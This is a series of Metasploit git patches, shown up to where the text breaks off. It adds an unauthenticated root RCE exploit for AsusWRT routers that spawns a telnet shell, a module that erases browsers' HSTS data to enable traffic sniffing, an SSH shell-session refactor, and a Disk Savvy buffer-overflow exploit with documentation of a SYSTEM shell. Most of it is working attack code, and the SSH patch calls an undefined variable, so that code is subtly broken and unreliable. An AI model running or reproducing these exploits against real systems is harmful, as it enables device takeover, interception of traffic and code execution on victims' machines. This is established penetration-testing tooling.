From c1fe35532986a7854de7a4ca1fc75c925a6a0c67 Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Mon, 22 Jan 2018 21:44:02 +0700 Subject: [PATCH 01/33] Create exploit for AsusWRT LAN RCE --- .../exploits/linux/http/asuswrt_lan_rce.rb | 129 ++++++++++++++++++ 1 file changed, 129 insertions(+) create mode 100644 modules/exploits/linux/http/asuswrt_lan_rce.rb diff --git a/modules/exploits/linux/http/asuswrt_lan_rce.rb b/modules/exploits/linux/http/asuswrt_lan_rce.rb new file mode 100644 index 0000000000..aa8e4ba1b8 --- /dev/null +++ b/modules/exploits/linux/http/asuswrt_lan_rce.rb @@ -0,0 +1,129 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'AsusWRT LAN Unauthenticated Remote Code Execution', + 'Description' => %q{ + The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to + perform a POST in certain cases. This can be combined with another vulnerability in + the VPN configuration upload routine that sets NVRAM configuration variables directly + from the POST request to enable a special command mode. + This command mode can then be abused by sending a UDP packet to infosvr, which is running + on port UDP 9999 to directly execute commands as root. + This exploit leverages that to start telnetd in a random port, and then connects to it. + It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743. + }, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'https://blogs.securiteam.com/index.php/archives/3589'], + ['URL', 'GITHUB'] + ], + 'Targets' => + [ + [ 'AsusWRT < v3.0.0.4.384.10007', + { + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, + }, + } + ], + ], + 'Privileged' => true, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DisclosureDate' => 'Jan 22 2018', + 'DefaultTarget' => 0)) + register_options( + [ + Opt::RPORT(9999) + ]) + + register_advanced_options( + [ + OptInt.new('ASUSWRTPORT', [true, 'AsusWRT HTTP portal port', 80]) + ]) + end + + def exploit + # first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD + # this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting! + post_data = Rex::MIME::Message.new + post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"ateCommand_flag\"") + + data = post_data.to_s + + res = send_request_cgi({ + 'uri' => "/vpnupload.cgi", + 'method' => 'POST', + 'rport' => datastore['ASUSWRTPORT'], + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" + }) + + if res and res.code == 200 + print_good("#{peer} - Successfully set the ateCommand_flag variable.") + else + fail_with(Failure::Unknown, "#{peer} - Failed to set ateCommand_flag variable.") + end + + + # ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above. + info_pdu_size = 512 # expected packet size, not sure what the extra bytes are + r = Random.new + + ibox_comm_pkt_hdr_ex = + [0x0c].pack('C*') + # NET_SERVICE_ID_IBOX_INFO 0xC + [0x15].pack('C*') + # NET_PACKET_TYPE_CMD 0x15 + [0x33,0x00].pack('C*') + # NET_CMD_ID_MANU_CMD 0x33 + r.bytes(4) + # Info, don't know what this is + r.bytes(6) + # MAC address + r.bytes(32) # Password + + telnet_port = rand((2**16)-1024)+1024 + cmd = "/usr/sbin/telnetd -l /bin/sh -p #{telnet_port}" + [0x00].pack('C*') + pkt_syscmd = + [cmd.length,0x00].pack('C*') + # cmd length + cmd # our command + + pkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size - (ibox_comm_pkt_hdr_ex + pkt_syscmd).length) + + connect_udp + udp_sock.put(pkt_final) # we could process the response, but we don't care + disconnect_udp + + print_status("#{peer} - Packet sent, let's sleep 10 seconds and try to connect to the router on port #{telnet_port}") + sleep(10) + + begin + ctx = { 'Msf' => framework, 'MsfExploit' => self } + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 10 }) + if not sock.nil? + print_good("#{peer} - Success, shell incoming!") + return handler(sock) + end + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + sock.close if sock + end + + print_bad("#{peer} - Well that didn't work... try again?") + end +end From b734af4e79271c2283163d503bacabe857d012fd Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Mon, 22 Jan 2018 22:00:48 +0700 Subject: [PATCH 02/33] Add my advisory URL --- modules/exploits/linux/http/asuswrt_lan_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/asuswrt_lan_rce.rb b/modules/exploits/linux/http/asuswrt_lan_rce.rb index aa8e4ba1b8..9cbe0f1d8c 100644 --- a/modules/exploits/linux/http/asuswrt_lan_rce.rb +++ b/modules/exploits/linux/http/asuswrt_lan_rce.rb @@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ ['URL', 'https://blogs.securiteam.com/index.php/archives/3589'], - ['URL', 'GITHUB'] + ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'] ], 'Targets' => [ From ae93162faf5a1fb2072dcd8b2d0deb7c1d279d75 Mon Sep 17 00:00:00 2001 From: UnaPibaGeek Date: Mon, 22 Jan 2018 18:53:16 -0300 Subject: [PATCH 03/33] HSTS eraser module --- modules/post/multi/manage/hsts_eraser.rb | 120 +++++++++++++++++++++++ 1 file changed, 120 insertions(+) create mode 100644 modules/post/multi/manage/hsts_eraser.rb diff --git a/modules/post/multi/manage/hsts_eraser.rb b/modules/post/multi/manage/hsts_eraser.rb new file mode 100644 index 0000000000..a2083d4384 --- /dev/null +++ b/modules/post/multi/manage/hsts_eraser.rb @@ -0,0 +1,120 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Post + include Msf::Post::File + include Msf::Post::Windows::UserProfiles + include Msf::Post::OSX::System + include Msf::Post::Unix + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Web browsers HSTS entries eraser', + 'Description' => %q{ + This module removes the HSTS database of the following web browsers: Mozilla Firefox, + Google Chrome, Opera & Safari. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Sheila A. Berta (UnaPibaGeek)', # ElevenPaths + ], + 'Platform' => %w(linux osx unix win), + 'References' => + [ + [ 'URL', 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html' ], + [ 'URL', 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf' ] + + ], + 'SessionTypes' => %w(meterpreter shell) + )) + end + + def run + profiles = user_profiles + + profiles.each do |user_profile| + account = user_profile['UserName'] + browsers_hsts_db_path = {} + + case session.platform + when 'windows' + browsers_hsts_db_path = { + 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\TransportSecurity", + 'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", #Just path for now + 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\TransportSecurity" + } + when 'unix', 'linux' + browsers_hsts_db_path = { + 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/TransportSecurity", + 'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", #Just path for now + 'Opera' => "#{user_profile['LocalAppData']}/.config/opera/TransportSecurity" + } + when 'osx' + browsers_hsts_db_path = { + 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/TransportSecurity", + 'Firefox' => "#{user_profile['LocalAppData']}/Firefox/Profiles", #Just path for now + 'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/TransportSecurity", + 'Safari' => "#{user_profile['AppData']}/Cookies/HSTS.plist" + } + else + print_error "Platform not recognized: #{session.platform}" + end + + browsers_hsts_db_path.each_pair do |browser, path| + if browser == 'Firefox' + hsts_db_path = [] + if directory?(path) + files = dir(path) + files.reject! { |file| %w(. ..).include?(file) } + files.each do |file_path| + hsts_db_path.push([path, file_path, 'SiteSecurityServiceState.txt'].join(system_separator)) if file_path.match(/.*\.default/) + end + end + path = hsts_db_path[0] + end + if !path.nil? and file?(path) + print_status "Removing #{browser} HSTS database for #{account}... " + file_rm(path) + end + end + end + + print_status "HSTS databases removed! Now enjoy your favorite sniffer! ;-)" + + end + + def user_profiles + user_profiles = [] + case session.platform + when /unix|linux/ + user_names = dir("/home") + user_names.reject! { |u| %w(. ..).include?(u) } + user_names.each do |user_name| + user_profiles.push('UserName' => user_name, "LocalAppData" => "/home/#{user_name}") + end + when /osx/ + user_names = session.shell_command("ls /Users").split + user_names.reject! { |u| u == 'Shared' } + user_names.each do |user_name| + user_profiles.push( + 'UserName' => user_name, + "AppData" => "/Users/#{user_name}/Library", + "LocalAppData" => "/Users/#{user_name}/Library/Application Support" + ) + end + when /windows/ + user_profiles |= grab_user_profiles + else + print_error "Error getting user profile data!" + end + user_profiles + end + + def system_separator + return session.platform == 'windows' ? '\\' : '/' + end + +end \ No newline at end of file From 621868b7fb8c838ad9aa1b031864295cd10bec08 Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Tue, 23 Jan 2018 11:26:39 +0700 Subject: [PATCH 04/33] Add CVE numbers --- modules/exploits/linux/http/asuswrt_lan_rce.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/asuswrt_lan_rce.rb b/modules/exploits/linux/http/asuswrt_lan_rce.rb index 9cbe0f1d8c..81ef45bdb3 100644 --- a/modules/exploits/linux/http/asuswrt_lan_rce.rb +++ b/modules/exploits/linux/http/asuswrt_lan_rce.rb @@ -30,7 +30,9 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ ['URL', 'https://blogs.securiteam.com/index.php/archives/3589'], - ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'] + ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'], + ['CVE', '2018-5999'], + ['CVE', '2018-6000'] ], 'Targets' => [ From 54c6aa7629869d89fae45b289eba944362f955f4 Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Fri, 26 Jan 2018 15:35:18 +0700 Subject: [PATCH 05/33] Add full disclosure URL --- modules/exploits/linux/http/asuswrt_lan_rce.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/linux/http/asuswrt_lan_rce.rb b/modules/exploits/linux/http/asuswrt_lan_rce.rb index 81ef45bdb3..66440322dc 100644 --- a/modules/exploits/linux/http/asuswrt_lan_rce.rb +++ b/modules/exploits/linux/http/asuswrt_lan_rce.rb @@ -31,6 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote [ ['URL', 'https://blogs.securiteam.com/index.php/archives/3589'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'], + ['URL', 'http://seclists.org/fulldisclosure/2018/Jan/78'], ['CVE', '2018-5999'], ['CVE', '2018-6000'] ], From eae9c6043015f881fc92e84556cef5aca95af12b Mon Sep 17 00:00:00 2001 From: UnaPibaGeek Date: Sat, 3 Feb 2018 02:18:30 -0300 Subject: [PATCH 06/33] Disclaimer and wget support added and syntax errors fixed. --- modules/post/multi/manage/hsts_eraser.rb | 22 ++++++++++++++++------ 1 file changed, 16 insertions(+), 6 deletions(-) diff --git a/modules/post/multi/manage/hsts_eraser.rb b/modules/post/multi/manage/hsts_eraser.rb index a2083d4384..8d336bf96b 100644 --- a/modules/post/multi/manage/hsts_eraser.rb +++ b/modules/post/multi/manage/hsts_eraser.rb @@ -13,8 +13,8 @@ class MetasploitModule < Msf::Post super(update_info(info, 'Name' => 'Web browsers HSTS entries eraser', 'Description' => %q{ - This module removes the HSTS database of the following web browsers: Mozilla Firefox, - Google Chrome, Opera & Safari. + This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox, + Google Chrome, Opera, Safari and wget. }, 'License' => MSF_LICENSE, 'Author' => @@ -22,17 +22,27 @@ class MetasploitModule < Msf::Post 'Sheila A. Berta (UnaPibaGeek)', # ElevenPaths ], 'Platform' => %w(linux osx unix win), + 'Arch' => [ARCH_X86,ARCH_X64], 'References' => [ [ 'URL', 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html' ], [ 'URL', 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf' ] - ], 'SessionTypes' => %w(meterpreter shell) )) + + register_options([ + OptBool.new('DISCLAIMER', + [true, 'This module will delete HSTS data from the target. Set this parameter to True in order to accept this warning.', false]) + ]) end def run + unless (datastore['DISCLAIMER'] == true) + print_error("This module will delete HSTS data from all browsers on the target. You must set the DISCLAIMER option to True to acknowledge that you understand this warning.") + return + end + profiles = user_profiles profiles.each do |user_profile| @@ -50,7 +60,8 @@ class MetasploitModule < Msf::Post browsers_hsts_db_path = { 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/TransportSecurity", 'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", #Just path for now - 'Opera' => "#{user_profile['LocalAppData']}/.config/opera/TransportSecurity" + 'Opera' => "#{user_profile['LocalAppData']}/.config/opera/TransportSecurity", + 'wget' => "#{user_profile['LocalAppData']}/.wget-hsts" } when 'osx' browsers_hsts_db_path = { @@ -116,5 +127,4 @@ class MetasploitModule < Msf::Post def system_separator return session.platform == 'windows' ? '\\' : '/' end - -end \ No newline at end of file +end From b1d0529161259e3cc7c7a5a70f379fd5cd467721 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 8 Feb 2018 02:21:16 -0600 Subject: [PATCH 07/33] prefer 'shell' channels over 'exec' channels for ssh If a command is not specified to CommandStream, request a "shell" session rather than running exec. This allows targets that do not have a true "shell" which supports exec to instead return a raw shell session. --- lib/net/ssh/command_stream.rb | 63 ++++++++++--------- modules/auxiliary/scanner/ssh/ssh_login.rb | 2 +- .../auxiliary/scanner/ssh/ssh_login_pubkey.rb | 2 +- .../apple_ios/ssh/cydia_default_ssh.rb | 2 +- .../ssh/ceragon_fibeair_known_privkey.rb | 2 +- .../linux/ssh/exagrid_known_privkey.rb | 2 +- .../linux/ssh/f5_bigip_known_privkey.rb | 2 +- ...oadbalancerorg_enterprise_known_privkey.rb | 2 +- .../linux/ssh/quantum_dxi_known_privkey.rb | 2 +- .../linux/ssh/quantum_vmpro_backdoor.rb | 2 +- .../exploits/linux/ssh/symantec_smg_ssh.rb | 2 +- .../linux/ssh/ubiquiti_airos_file_upload.rb | 2 +- .../linux/ssh/vmware_vdp_known_privkey.rb | 2 +- .../ssh/array_vxag_vapv_privkey_privesc.rb | 2 +- .../unix/ssh/tectia_passwd_changereq.rb | 2 +- 15 files changed, 48 insertions(+), 43 deletions(-) diff --git a/lib/net/ssh/command_stream.rb b/lib/net/ssh/command_stream.rb index f9d82cd518..11ef475d28 100644 --- a/lib/net/ssh/command_stream.rb +++ b/lib/net/ssh/command_stream.rb @@ -15,7 +15,34 @@ class CommandStream attr_accessor :localinfo end - def initialize(ssh, cmd, cleanup = false) + def shell_requested(channel, success) + raise "could not request ssh shell" unless success + channel[:data] = '' + + channel.on_eof do + self.rsock.close rescue nil + self.ssh.close rescue nil + self.thread.kill + end + + channel.on_close do + self.rsock.close rescue nil + self.ssh.close rescue nil + self.thread.kill + end + + channel.on_data do |ch,data| + self.rsock.write(data) + end + + channel.on_extended_data do |ch, ctype, data| + self.rsock.write(data) + end + + self.channel = channel + end + + def initialize(ssh, cmd = nil, cleanup = true) self.lsock, self.rsock = Rex::Socket.tcp_socket_pair() self.lsock.extend(Rex::IO::Stream) @@ -23,7 +50,7 @@ class CommandStream self.rsock.extend(Rex::IO::Stream) self.ssh = ssh - self.thread = Thread.new(ssh,cmd,cleanup) do |rssh,rcmd,rcleanup| + self.thread = Thread.new(ssh,cmd,cleanup) do |rssh, rcmd, rcleanup| begin info = rssh.transport.socket.getpeername_as_array @@ -33,32 +60,10 @@ class CommandStream self.lsock.localinfo = "#{info[1]}:#{info[2]}" rssh.open_channel do |rch| - rch.exec(rcmd) do |c, success| - raise "could not execute command: #{rcmd.inspect}" unless success - - c[:data] = '' - - c.on_eof do - self.rsock.close rescue nil - self.ssh.close rescue nil - self.thread.kill - end - - c.on_close do - self.rsock.close rescue nil - self.ssh.close rescue nil - self.thread.kill - end - - c.on_data do |ch,data| - self.rsock.write(data) - end - - c.on_extended_data do |ch, ctype, data| - self.rsock.write(data) - end - - self.channel = c + if cmd.nil? + rch.send_channel_request("shell", &method(:shell_requested)) + else + rch.exec(rsh, &method(:shell_requested)) end end @@ -85,7 +90,7 @@ class CommandStream end # Shut down the SSH session if requested - if(rcleanup) + if rcleanup rssh.close end end diff --git a/modules/auxiliary/scanner/ssh/ssh_login.rb b/modules/auxiliary/scanner/ssh/ssh_login.rb index b495195fb5..79d5b38083 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login.rb @@ -57,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary return unless ssh_socket # Create a new session - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh_socket) merge_me = { 'USERPASS_FILE' => nil, diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb index f0b271e46a..703e8b9094 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb @@ -72,7 +72,7 @@ class MetasploitModule < Msf::Auxiliary return unless ssh_socket # Create a new session from the socket - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh_socket) # Clean up the stored data - need to stash the keyfile into # a datastore for later reuse. diff --git a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb index 781db9a106..e0ac301d69 100644 --- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb +++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb @@ -110,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote end if ssh - conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh) ssh = nil return conn end diff --git a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb index b4f9e873e8..96864ee5b4 100644 --- a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb +++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb @@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote if ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh_socket) ssh_socket = nil return conn diff --git a/modules/exploits/linux/ssh/exagrid_known_privkey.rb b/modules/exploits/linux/ssh/exagrid_known_privkey.rb index f2304c91a6..5742000cc3 100644 --- a/modules/exploits/linux/ssh/exagrid_known_privkey.rb +++ b/modules/exploits/linux/ssh/exagrid_known_privkey.rb @@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote if ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash -i', true) + conn = Net::SSH::CommandStream.new(ssh_socket) ssh_socket = nil return conn diff --git a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb index 0cf2138f9e..4fe890b696 100644 --- a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb +++ b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb @@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote return false unless ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh_socket) ssh_socket = nil conn end diff --git a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb index bff7067f67..5fb276c2ba 100644 --- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb +++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb @@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote if ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash', true) + conn = Net::SSH::CommandStream.new(ssh_socket) ssh_socket = nil return conn diff --git a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb index 3c4ef23169..0d8a939067 100644 --- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb +++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb @@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote if ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash', true) + conn = Net::SSH::CommandStream.new(ssh_socket) ssh_socket = nil return conn diff --git a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb index 48714417a1..d2c4f96ea6 100644 --- a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb +++ b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb @@ -114,7 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote end if ssh - conn = Net::SSH::CommandStream.new(ssh, 'shell-escape', true) + conn = Net::SSH::CommandStream.new(ssh, 'shell-escape') return conn end diff --git a/modules/exploits/linux/ssh/symantec_smg_ssh.rb b/modules/exploits/linux/ssh/symantec_smg_ssh.rb index 6f812d10fb..b48a856c9b 100644 --- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb +++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb @@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote end if ssh - conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh) ssh = nil return conn end diff --git a/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb b/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb index 84d547712a..4094cb72a6 100644 --- a/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb +++ b/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb @@ -153,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote private: private_key, private_type: :ssh_key ) - return Net::SSH::CommandStream.new(ssh, '/bin/sh', true) + return Net::SSH::CommandStream.new(ssh) end nil diff --git a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb index a914837815..6a688756a5 100644 --- a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb +++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb @@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote if ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh_socket) self.sockets.delete(ssh_socket.transport.socket) return conn diff --git a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb index 4ee91ab322..778902cb34 100644 --- a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb +++ b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb @@ -186,6 +186,6 @@ class MetasploitModule < Msf::Exploit::Remote # Make the SSH connection and execute our commands + payload print_status("#{rhost}:#{rport} - Sending and executing payload to gain root privileges!") - Net::SSH::CommandStream.new(ssh, build_command, true) + Net::SSH::CommandStream.new(ssh, build_command) end end diff --git a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb index 53a0a22034..85064b1092 100644 --- a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb +++ b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb @@ -177,7 +177,7 @@ class MetasploitModule < Msf::Exploit::Remote message = transport.next_message.type if message.to_i == 6 #SSH2_MSG_SERVICE_ACCEPT - shell = Net::SSH::CommandStream.new(connection, '/bin/sh', true) + shell = Net::SSH::CommandStream.new(connection) connection = nil return shell end From 07763ccd6a36fd549b651af1caea70ce2941202b Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Wed, 14 Feb 2018 20:35:03 +0000 Subject: [PATCH 08/33] Disk Savvy Server Buffer Overflow Documentation --- .../exploit/windows/misc/disk_savvy_adm.md | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 documentation/modules/exploit/windows/misc/disk_savvy_adm.md diff --git a/documentation/modules/exploit/windows/misc/disk_savvy_adm.md b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md new file mode 100644 index 0000000000..ad83328205 --- /dev/null +++ b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md @@ -0,0 +1,39 @@ +## Vulnerable Application + +[DiskSavvy Enterprise](http://www.disksavvy.com/) version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at [DiskSavvy Enterprise](http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe). + +## Verification Steps + 1. Install a vulnerable DiskSavvy Enterprise + 6. Start `msfconsole` + 3. Do `exploit/windows/misc/disk_savvy_adm` + 4. Do `set RHOST ip` + 5. Do `set PAYLOAD windows/shell/bind_tcp` + 13. Do `exploit` + 7. Enjoy you shell + +## Scenarios + +###DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86 + +``` +msf > use exploit/windows/misc/disk_savvy_adm +msf exploit(windows/misc/disk_savvy_adm) > set RHOST 192.168.216.55 +RHOST => 192.168.216.55 +msf exploit(windows/misc/disk_savvy_adm) > set payload windows/shell/bind_tcp +payload => windows/shell/bind_tcp +msf exploit(windows/misc/disk_savvy_adm) > exploit + +[*] Started bind handler +[*] Encoded stage with x86/shikata_ga_nai +[*] Sending encoded stage (267 bytes) to 192.168.216.55 +[*] Command shell session 1 opened (192.168.216.5:36113 -> 192.168.216.55:4444) at 2018-02-14 15:19:02 -0500 + +Microsoft Windows [Version 6.1.7601] +Copyright (c) 2009 Microsoft Corporation. All rights reserved. + +C:\Windows\system32>whoami +whoami +nt authority\system + +C:\Windows\system32> +``` From 929027ab96c9390dc7584e906008ccba7b3e2ec7 Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Wed, 14 Feb 2018 20:35:32 +0000 Subject: [PATCH 09/33] Disk Savvy Server Buffer Overflow --- .../exploits/windows/misc/disk_savvy_adm.rb | 76 +++++++++++++++++++ 1 file changed, 76 insertions(+) create mode 100644 modules/exploits/windows/misc/disk_savvy_adm.rb diff --git a/modules/exploits/windows/misc/disk_savvy_adm.rb b/modules/exploits/windows/misc/disk_savvy_adm.rb new file mode 100644 index 0000000000..1495ad5de3 --- /dev/null +++ b/modules/exploits/windows/misc/disk_savvy_adm.rb @@ -0,0 +1,76 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Disk Savvy Enterprise v10.4.18', + 'Description' => %q{ + This module exploits a stack-based buffer overflow vulnerability + in Disk Savvy Enterprise v10.4.18, caused by improper bounds + checking of the request sent to the built-in server. This module + has been tested successfully on Windows 7 SP1 x86. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Daniel Teixeira' + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x02\x0a\x0d\xf8", + 'Space' => 355 + }, + 'Targets' => + [ + [ 'Disk Savvy Enterprise v10.4.18', + { + 'Offset' => 124, + 'Ret' => 0x10056d13 + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Jan 31 2017', + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(9124)]) + + end + + def exploit + connect + + buffer = make_nops(target['Offset']) + buffer << "\x90\x09\xEB\x05" + buffer << [target.ret].pack('V') + buffer << make_nops(10) + buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,100").encode_string * 20 + buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp esp").encode_string + buffer << make_nops(441) + buffer << payload.encoded + + 